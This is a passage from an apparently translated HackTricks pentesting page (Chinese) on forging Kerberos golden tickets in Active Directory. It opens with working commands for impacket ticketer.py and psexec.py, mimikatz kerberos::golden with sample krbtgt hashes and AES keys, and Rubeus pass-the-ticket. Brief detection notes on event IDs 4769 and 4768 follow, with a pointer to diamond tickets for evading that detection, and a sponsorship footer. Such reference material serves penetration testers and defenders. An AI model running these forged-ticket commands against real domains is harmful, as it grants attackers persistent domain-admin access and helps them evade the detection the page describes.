复制 python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME = /root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
复制 #mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
. \ Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory
# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi
复制 Get-DomainPolicy | select -expand KerberosPolicy
复制 不幸的是,TGT 的生命周期未记录在 4769 中,因此您在 Windows 事件日志中找不到此信息。但是,您可以关联的是 **在没有先前的 4768 的情况下看到 4769** 。 **没有 TGT 的情况下无法请求 TGS** ,如果没有 TGT 发行记录,我们可以推断它是离线伪造的。
为了 **绕过此检测** ,检查 diamond tickets:
<div data-gb-custom-block data-tag="content-ref" data-url='diamond-ticket.md'>
[ diamond-ticket.md ](diamond-ticket.md)
</div>
### 缓解
* 4624: 帐户登录
* 4672: 管理员登录
* `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property`
防御者可以做的其他小技巧是 **对敏感用户的 4769 进行警报** ,例如默认域管理员帐户。
## 参考资料
* [ https://www.tarlogic.com/blog/how-to-attack-kerberos/ ](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
* [ https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets ] (https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告** 或 **下载 PDF 版本的 HackTricks** ,请查看 [ **订阅计划** ](https://github.com/sponsors/carlospolop) !
* 获取 [ **官方 PEASS & HackTricks 商品** ](https://peass.creator-spring.com)
* 探索 [ **PEASS Family** ](https://opensea.io/collection/the-peass-family) ,我们的独家 [ **NFTs** ](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [ **Discord 群组** ](https://discord.gg/hRep4RUj7f) 或 [ **电报群组** ](https://t.me/peass) 或在 **Twitter** 🐦 [ **@carlospolopm** ](https://twitter.com/hacktricks_live) ** 上**关注我们。
* 通过向 [ **HackTricks** ](https://github.com/carlospolop/hacktricks) 和 [ **HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>